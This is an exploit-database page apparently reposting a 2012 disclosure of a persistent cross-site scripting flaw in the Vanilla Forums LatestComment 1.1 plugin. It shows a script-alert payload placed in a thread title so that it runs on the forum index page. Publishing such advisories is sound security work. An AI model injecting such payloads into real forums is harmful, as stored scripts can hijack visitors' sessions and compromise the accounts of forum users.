[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Vanilla Forums LatestComment 1.1 Plugin Persistent XSS

Author
Henry Hoggard
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-18320
Category
web applications
Date add
18-05-2012
Platform
php
# Title: Vanilla LatestComment 1.1 Plugin Persistant XSS Vulnerability
# Date: 18/5/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + Latest Comment 1.1
 
#http://vanillaforums.org/addon/latestcomment-plugin
 
# http://vanillaforums.org
#############################################################
 
Create a new thread with your XSS as the thread title, the XSS will appear on the index page of the forum.
 
XSS:
<script>alert('x')</script>
 
#############################################################
 
http://henryhoggard.co.uk



#  0day.today [2024-11-15]  #